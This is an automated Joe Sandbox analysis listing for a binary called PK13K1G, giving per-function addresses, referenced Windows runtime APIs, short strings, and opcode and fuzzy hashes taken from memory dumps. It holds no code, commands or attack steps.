Opcode ID: 886c2d350a72d3cc0982a324154e37032b669d85da8ed8cc1c093a447a4ef7dc
Instruction ID: aa867dc53852329ae90cd593e98728271b4269523442df50c77956c3bb47af36
Opcode Fuzzy Hash: 886c2d350a72d3cc0982a324154e37032b669d85da8ed8cc1c093a447a4ef7dc
Instruction Fuzzy Hash: B2E12936A14251CFC718CF38D8A12BFB7E2EB8A304F0A85BDD49697345D638D845CB85

Function 00436410 Relevance: .5, Instructions: 480COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 789159a7b912d74aad53d57ce0ebd354c48bfe0fc9c09824d19b4c82a1bb3e2d
Instruction ID: dae2ff369a04a2243cba25d3faea41956bd88817dbf5c9d88916ad1f07774027
Opcode Fuzzy Hash: 789159a7b912d74aad53d57ce0ebd354c48bfe0fc9c09824d19b4c82a1bb3e2d
Instruction Fuzzy Hash: 19C17A35608301ABD728DF24DC81A2FB7E6EBC9714F26E52EE48557391DB34DC02879A

Function 0042B5BC Relevance: .4, Instructions: 415COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f34530e6ec056a9a755d080942471ee42a9056f9927be68429a5b3cda3fd5ac4
Instruction ID: 079b78a8586512a8d24056ec09e303c646c0e377228e0eedea4d6a224cbc6856
Opcode Fuzzy Hash: f34530e6ec056a9a755d080942471ee42a9056f9927be68429a5b3cda3fd5ac4
Instruction Fuzzy Hash: CCC1D3706046928EE7128F399450772FFE1EFA3300F28958AD4D69F393C7799846CBA5

Function 0042B5B7 Relevance: .4, Instructions: 402COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fab6ce3c47c271bbfb04632252be509b1c9650805b15787e1a592feb4374383d
Instruction ID: b32ae3a19ee44f141cb099e020399d5ff6bab934a2582f8b32cdbe54a99820f3
Opcode Fuzzy Hash: fab6ce3c47c271bbfb04632252be509b1c9650805b15787e1a592feb4374383d
Instruction Fuzzy Hash: F4D103706087928EE7118F399490372FBE2EFA7310F18959AC5D65F393C3399846C7A9

Function 00428992 Relevance: .4, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5079a333c0a62375fc670e81a092325b6cac01856037fd3ea593772f468af158
Instruction ID: 1cf468dd86bba270219739c0dc88f70eb14147e14378908f76bcfe1aa50fa7e8
Opcode Fuzzy Hash: 5079a333c0a62375fc670e81a092325b6cac01856037fd3ea593772f468af158
Instruction Fuzzy Hash: 87C125B19083519FC714CF14D8813AFBBE1AB95304F498A7EE4D987382E6399905CB86

Function 004280D8 Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ecf3d9c297bf73da728c4f8d8ca528649f43979521e98c79c8174fcd24620f3
Instruction ID: 1289d89b3145e1e5c5d2bdf2d7684d0191de9767e15cf2d012e94a4e7c28b01a
Opcode Fuzzy Hash: 1ecf3d9c297bf73da728c4f8d8ca528649f43979521e98c79c8174fcd24620f3
Instruction Fuzzy Hash: 54B1DBB1A483258BD324CF28D85165FB7F1FFC5304F05892DE9958B285EB74DA068B8A

Function 0043D310 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ed191748a0fded21425231c24f7753b9664f3f2d9db04562b527cc3dc60e30ff
Instruction ID: 22cc8a6fb43a36d32ea36a105980903e1c8edb3e0cbc9aefdf9cef6f5766ab9f
Opcode Fuzzy Hash: ed191748a0fded21425231c24f7753b9664f3f2d9db04562b527cc3dc60e30ff
Instruction Fuzzy Hash: 9491F336A043119BC718DF28D890A2BB7E2EFD9710F15A52EE895873A5DB34DC11CB4A

Function 0043D050 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7a8e611b1c8dfb27fa6feb7b1577c091ae5bc68218257dcd34e33bf6690035db
Instruction ID: d19a0f97d0927db3c456e8c4f90c263e5c07e638e18e756bcdc3b62df7dbf011
Opcode Fuzzy Hash: 7a8e611b1c8dfb27fa6feb7b1577c091ae5bc68218257dcd34e33bf6690035db
Instruction Fuzzy Hash: EE713736E042115BDB289F28DC50A3FB7E2EBD9750F15A53EE88687390DB38DC518789

Function 0042BFCE Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73ecdd2c1e34d6c3b3ab21a19999f6c4416ab8289d654b9be2fc27ae0dfe4cdb
Instruction ID: 259720eca5280ba2aea60c22166654e02d49084e10aa69b1485d8ba5e71d0fc1
Opcode Fuzzy Hash: 73ecdd2c1e34d6c3b3ab21a19999f6c4416ab8289d654b9be2fc27ae0dfe4cdb
Instruction Fuzzy Hash: BC817D31744752CFE3258F28C8D1767BBA2EF96311F28865DD4A60B3D2D339A809C799

Function 00402300 Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd51f30d761162a7c6ce5429c6362efbf25af0c74673144c5990fadf3b44597b
Instruction ID: 88703e2295524fe95ff63e8d3a75298e2e88069329c1703d4291e731adfb849d
Opcode Fuzzy Hash: dd51f30d761162a7c6ce5429c6362efbf25af0c74673144c5990fadf3b44597b
Instruction Fuzzy Hash: 3A6180B04047419FD3109F28ED09707BBA0FF4136DF144739E8AA966E1D375E9A5CB8A

Function 004361D0 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 466cf4a73e56cf956409116cce209d7ec644454acfa9d6d37b209ce16fb92957
Instruction ID: cda90bef128fc863524e99e8a9c7fd18d2454e219d72a2c22af5fa6fb9d4da8d
Opcode Fuzzy Hash: 466cf4a73e56cf956409116cce209d7ec644454acfa9d6d37b209ce16fb92957
Instruction Fuzzy Hash: 58510374608301ABE7009F25DC81B2FB7E5EB99708F11983DF58583292DB75E815CB5A

Function 0042BE04 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6250733809db5540309aa9a038dba8afd3562d91c8ee9719092b4a06d636d437
Instruction ID: 908597379e72e99e00a864fed254744fa6c889c2b4e2f8ba7d6d17dd1ef75677
Opcode Fuzzy Hash: 6250733809db5540309aa9a038dba8afd3562d91c8ee9719092b4a06d636d437
Instruction Fuzzy Hash: A05136756043928FD7158F29D4E0772BFE2EFA7304F28848DE4D68B752C37958068B95

Function 0040C896 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 898ef28f4221b8e006b885ebe80cb0d53838104b14eef60669c9e3b8c2c6948e
Instruction ID: bf21709e5708faaac2fa80984ec19600992f78f9ac8f60178462bcff55205f80
Opcode Fuzzy Hash: 898ef28f4221b8e006b885ebe80cb0d53838104b14eef60669c9e3b8c2c6948e
Instruction Fuzzy Hash: 963112B590C352CBC318CF14C85422BBBF1AFC5304F548A1DE5D6AB390DB399909CB9A

Function 00433060 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 7af6f9ac4628b99412b71336d13abc9c5f62d47808e247d6dc5e5a6bd3d6b1b4
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 9011CA337091D40EC3198D3C8500565BFB30A97235F59939AE4B49B2D6D62B8E8A8359

Function 00429EE0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1b2d3277d7e963b4222a10b6e2f928e1e35a9c28ca68718afcd72ea9750fc75
Instruction ID: 9a1d96ef6a423383bf338333d5e8650ac0c2383f8919b51e5d8b765a7dddb9c9
Opcode Fuzzy Hash: c1b2d3277d7e963b4222a10b6e2f928e1e35a9c28ca68718afcd72ea9750fc75
Instruction Fuzzy Hash: A1019EB1B0031247D760DE55A5C1727B2AAAB80708F09443EE908A7342DB79FC04C6AA

Function 0041B569 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f026b8f760c1703a6e992b70c29aaf2ac444cc3bdceed413e9e275af1ff90ea
Instruction ID: b0ae7064a080979aa594471211cc0a49dbf6305e8532ef9b3be45474e0222ccb
Opcode Fuzzy Hash: 2f026b8f760c1703a6e992b70c29aaf2ac444cc3bdceed413e9e275af1ff90ea
Instruction Fuzzy Hash: 36113471A193514BC318CF38C56036BFBD1AB86344F0899ACE0D2D7281DB38C9088BD2

Function 00402B90 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d44741037331e0972bc85dc7e4ee133ce3d30638f94bb59ed739d09591dacc21
Instruction ID: 2e59f1d48df6bf6a86610a1febb7407c3b679d0b0e642927da25f2ba3d6d3f7a
Opcode Fuzzy Hash: d44741037331e0972bc85dc7e4ee133ce3d30638f94bb59ed739d09591dacc21
Instruction Fuzzy Hash: 55F0E97A7091160BE750DD66ECC8937F3A6E7C6304B09553AE941E7381C971FC06C2A8

Function 0040A500 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 48911f0b8b0b35ff35454feb1d28298a083cddac618c482baf8995cfe99f1ab7
Instruction ID: 13a836e7ac787db140c28b87ee684c35249822ae58bbc1e7cf95dbc30d08ca77
Opcode Fuzzy Hash: 48911f0b8b0b35ff35454feb1d28298a083cddac618c482baf8995cfe99f1ab7
Instruction Fuzzy Hash: 5FD0C9B9945200ABC614AF15ED03436F662AB47349F18243DF54B92372DF21D865DA0E

Function 0042FDBD Relevance: 22.8, APIs: 2, Strings: 11, Instructions: 86COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0042FDC7
VariantInit.OLEAUT32 ref: 0042FDDA

Strings

x, xrefs: 0042FE02
x, xrefs: 0042FE2A
K, xrefs: 0042FDF8
L, xrefs: 0042FE52
c, xrefs: 0042FE3E
R, xrefs: 0042FE34
p, xrefs: 0042FE0C
u, xrefs: 0042FE16
v, xrefs: 0042FE5C
~, xrefs: 0042FE48
{, xrefs: 0042FE20

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID: Variant$ClearInit
String ID: K$L$R$c$p$u$v$x$x${$~
API String ID: 2610073882-3013988325
Opcode ID: 41938623cdea7c6d8a7d990dc466fba47123ddec533b799e5538a814f436886c
Instruction ID: e8d88003f9eebcb4fba176d769172fff3c993f50e434b8464aa4e4337d8b57bf
Opcode Fuzzy Hash: 41938623cdea7c6d8a7d990dc466fba47123ddec533b799e5538a814f436886c
Instruction Fuzzy Hash: 0741273050C7C19AD365DB28888879FBFE16BD6224F484A9CF1E9473D2D7799409C793

Function 0002F878 Relevance: 12.2, APIs: 8, Instructions: 248COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,?,?,0002F863,?,?,?,?,?,?,?,?,?), ref: 0002F91E
__alloca_probe_16.LIBCMT ref: 0002F9D9
__alloca_probe_16.LIBCMT ref: 0002FA68
__freea.LIBCMT ref: 0002FAB3
__freea.LIBCMT ref: 0002FAB9
__freea.LIBCMT ref: 0002FAEF
__freea.LIBCMT ref: 0002FAF5
__freea.LIBCMT ref: 0002FB05

Memory Dump Source

Source File: 00000008.00000002.2557668509.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000008.00000002.2557545083.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558032872.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558280024.000000000003A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558449701.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558549615.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_20000_PK13K1G.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 3717ab8b1cb359b115dfa02723a45e111a9cb83ad9004a0c1c99f246f4a1a29b
Instruction ID: 51dfea5bfd603e93b58d898f3a802ba9085fcb5a5713615ddfa0642d4de83942
Opcode Fuzzy Hash: 3717ab8b1cb359b115dfa02723a45e111a9cb83ad9004a0c1c99f246f4a1a29b
Instruction Fuzzy Hash: ED71C572A002276BDF219F54EC52BFF77F99F45794F290079E908A7282DB359C408791

Function 000294CE Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,BB40E64E,?,000295DD,00022442,?,00000000,?), ref: 0002958F

Strings

api-ms-, xrefs: 00029525
ext-ms-, xrefs: 00029539

Memory Dump Source

Source File: 00000008.00000002.2557668509.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000008.00000002.2557545083.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558032872.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558280024.000000000003A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558449701.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558549615.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_20000_PK13K1G.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 07a564f08ec1a0719e6cb32a07ebe024df3b3a30f756e0c11abd0b64902d1f2f
Instruction ID: ce1c58192c643f8ad419e7be1bf6ee1b9bd0955a3c77ff90747a420994d91ba5
Opcode Fuzzy Hash: 07a564f08ec1a0719e6cb32a07ebe024df3b3a30f756e0c11abd0b64902d1f2f
Instruction Fuzzy Hash: D9210A71B01631ABE7339B65FC80A5A77ACEB45761F250120FE0AA7291DB34EE05C7D0

Function 0002489F Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 000248A5
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 000248B3
GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 000248C4

Strings

GetTempPath2W, xrefs: 000248B9
GetSystemTimePreciseAsFileTime, xrefs: 000248AD
kernel32.dll, xrefs: 000248A0

Memory Dump Source

Source File: 00000008.00000002.2557668509.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000008.00000002.2557545083.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558032872.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558280024.000000000003A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558449701.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558549615.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_20000_PK13K1G.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
API String ID: 667068680-1047828073
Opcode ID: 344e6963716681d7935098fc8e378208424937aadecbaadbf9c03027b3c2299f
Instruction ID: 80dd44e93362fa8b479edf988b36292de8467f1eceaa91200481f6eb16c1b03c
Opcode Fuzzy Hash: 344e6963716681d7935098fc8e378208424937aadecbaadbf9c03027b3c2299f
Instruction Fuzzy Hash: E2D0A731682B20AFA3879F717C0D84A3EACEB04342701C051F700D7261DBBC05048F90

Function 00027F49 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00027F40,00025A6B,00025180), ref: 00027F57
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00027F65
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00027F7E
SetLastError.KERNEL32(00000000,00027F40,00025A6B,00025180), ref: 00027FD0

Memory Dump Source

Source File: 00000008.00000002.2557668509.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000008.00000002.2557545083.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558032872.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558280024.000000000003A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558449701.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558549615.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_20000_PK13K1G.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 449daec3fbe70f6fb9dcec8367fb0d90664fa87d3ef7be6c33014c69149e02c7
Instruction ID: 505fd3ab3a1c4b07a800206f0f5217b21834afab978b858ee6e321c456d15a68
Opcode Fuzzy Hash: 449daec3fbe70f6fb9dcec8367fb0d90664fa87d3ef7be6c33014c69149e02c7
Instruction Fuzzy Hash: 3101DF3260C3326EF6A72774BDC58AA6BA8DB47774720023AF418854F2EF154C129251

Function 000287D9 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 000288F8
CallUnexpected.LIBVCRUNTIME ref: 00028B71

Strings

csm, xrefs: 0002892F
csm, xrefs: 00028816
csm, xrefs: 00028883

Memory Dump Source

Source File: 00000008.00000002.2557668509.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000008.00000002.2557545083.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558032872.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558280024.000000000003A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558449701.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558549615.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_20000_PK13K1G.jbxd

Similarity

API ID: CallUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 2673424686-393685449
Opcode ID: 1a71743cd2bec0480259e44135abd19b4dd0811efbba0a74284950a7e4a1c293
Instruction ID: e9b8b11500b991d778fdc125577be05b791a7915b1afc6bf35b1e247bf97e8fb
Opcode Fuzzy Hash: 1a71743cd2bec0480259e44135abd19b4dd0811efbba0a74284950a7e4a1c293
Instruction Fuzzy Hash: D6B19F79802229EFDF55DFA4E8819EEB7B5FF04310F54815AF8056B202DB31DA51CB92

Function 00430191 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 115COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 004301E5

Strings

$, xrefs: 00430232
", xrefs: 00430222
&, xrefs: 00430242
, xrefs: 00430212

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID: InitVariant
String ID: $"$$$&
API String ID: 1927566239-1176268712
Opcode ID: a67e13eb9628de2e92f67e202159a30295aff75e3356f99a5f53b544d162ad83
Instruction ID: 490547f344ca17d61a2ec6906c0e4e747f22ebce8f8bee03cc950822ae520b38
Opcode Fuzzy Hash: a67e13eb9628de2e92f67e202159a30295aff75e3356f99a5f53b544d162ad83
Instruction Fuzzy Hash: 5651157160C7C18ED331CB28889878BBED1AB96324F198A6DD5E84B3E2C7B84549C753

Function 00026A60 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,00031B77,000000FF,?,00026B21,?,?,00026BBD,00000000), ref: 00026A95
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00026AA7
FreeLibrary.KERNEL32(00000000,?,00000000,00031B77,000000FF,?,00026B21,?,?,00026BBD,00000000), ref: 00026AC9

Strings

CorExitProcess, xrefs: 00026A9F
mscoree.dll, xrefs: 00026A8E

Memory Dump Source

Source File: 00000008.00000002.2557668509.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000008.00000002.2557545083.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558032872.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558280024.000000000003A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558449701.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558549615.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_20000_PK13K1G.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 2d520dbcd38db49bf2079f21c9032c7e4a51f234f3c0808ed8268a32843ab31b
Instruction ID: 309e9fc2df16b2332a99de826411d685e8680f6d1c43f46c67c333b09b794a4c
Opcode Fuzzy Hash: 2d520dbcd38db49bf2079f21c9032c7e4a51f234f3c0808ed8268a32843ab31b
Instruction Fuzzy Hash: 6401A271944669BFDB128F40DC0AFAEB7FCFB04B11F044126F812A22A0DB799904CA80

Function 0002D525 Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 0002D5AA
__alloca_probe_16.LIBCMT ref: 0002D673
__freea.LIBCMT ref: 0002D6DA

Part of subcall function 0002B3B5: HeapAlloc.KERNEL32(00000000,?,00000000,?,00023C34,?,?,00022442,00001000,?,000223AA), ref: 0002B3E7

__freea.LIBCMT ref: 0002D6ED
__freea.LIBCMT ref: 0002D6FA

Memory Dump Source

Source File: 00000008.00000002.2557668509.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000008.00000002.2557545083.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558032872.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558280024.000000000003A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558449701.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558549615.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_20000_PK13K1G.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: fb6e12e1a965fd471b6a8d5341caf0385c11003997ff317903d4de1cf596ed8c
Instruction ID: fdb170bd8c13dda0cd87daf86c1191bfabeeaf5aabbf6cca05f70534b64ff865
Opcode Fuzzy Hash: fb6e12e1a965fd471b6a8d5341caf0385c11003997ff317903d4de1cf596ed8c
Instruction Fuzzy Hash: 8A51C272600666AFEB219F64FC89EBF3BE9EF44714B19012AFD09D6142EB75CD10C660

Function 00021930 Relevance: 7.7, APIs: 5, Instructions: 196COMMON

Download Yara Rule

APIs

GetFileSize.KERNEL32 ref: 00021A01
CloseHandle.KERNEL32 ref: 00021A1E

Memory Dump Source

Source File: 00000008.00000002.2557668509.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000008.00000002.2557545083.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558032872.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558280024.000000000003A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558449701.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558549615.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_20000_PK13K1G.jbxd

Similarity

API ID: CloseFileHandleSize
String ID:
API String ID: 3849164406-0
Opcode ID: eb365153de8d2ca5ed530107c2831eafd85e4619d4f0304e5894fb7b6389f9cc
Instruction ID: 678e0c3dcd2733ea1f0fbf0f1f4ab6cf1b1f150db46c55359de10e617071a031
